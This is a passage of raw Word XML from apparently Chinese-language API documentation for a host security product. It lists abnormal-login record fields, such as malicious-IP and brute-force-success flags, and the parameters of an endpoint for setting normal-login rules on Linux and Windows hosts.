        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ABC453A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>来源IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0AD6DF85" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A004550" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>clientLocation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="376FD7CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58B65665" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="661D3DC0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录区域</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="47A6F00F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7049B2F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>evilIpDb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="566318F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32C1FCAC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="570721C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否恶意IP库；0-否,1-是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="603AF692" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A544E75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>crackSuccess</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F52C4A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="654E446E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06A4180A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>暴力破解成功的登录：0-否；1-是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="66B62A9C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51122F0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>abnormalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41A41B21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FB1A22B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CA73C03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>不在常用</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>段登录，0:否,1：是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F772A6A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="758D95AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>abnormalLocation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53B453CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48000224" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="435F0608" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>不在常用区域的登录，0-否；1-是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="239EA24D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09A2DF41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>abnormalTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="485B83AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79D74D20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53B6B731" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>不在常用时间的登录，0:否,1：是</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="52623EBF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17C5331A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginRuleId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="034618BB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Set</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="332F7ED3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="402123AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>正常登录规则ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E0E073F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="279" w:name="_Toc115166214"/>
      <w:bookmarkStart w:id="280" w:name="设置规则"/>
      <w:bookmarkEnd w:id="278"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>设置规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="279"/>
    </w:p>
    <w:p w14:paraId="1B38B7E8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows异常登录设置正常登录规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F405B6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C0D6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>abnormallogin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EC0789"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2398"/>
        <w:gridCol w:w="1129"/>
        <w:gridCol w:w="900"/>
        <w:gridCol w:w="5655"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="745ADAD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DE9CCB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3D5E6570" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="696649EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="142F4446" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6DC53A65" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C8B3B48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="646E21AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="700EF8F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0971CCAA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机范围，1：自定义，包括业务组、主机； 0：全部主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="62791213" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="425E2E13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="321A72A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BAC81A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63F5A99F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="34FB713B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59B75085" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6898F48D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EEAB730" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D8290D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机列表，如果</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>realmType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>=1, 则</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>和groups至少有一个不为空</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3BFCAB08" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D33B834" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginIpInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="342E7F94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76E11EB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3563428B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="60B85D41" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="673A3842" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginTimeInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F8D1A76" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="233CFC95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75B2A031" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="48982B12" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BDE5E5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>loginLocationInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> Object</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CD6976F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F7C5704" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>登录区域</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3022F831" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="36E9F001" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10B91F05" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28E7AF40" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B3AF913" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00722B0B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（windows无该参数）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47A93A3E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>loginIpInfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="902"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3280"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4763821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22C46B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37A10344" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
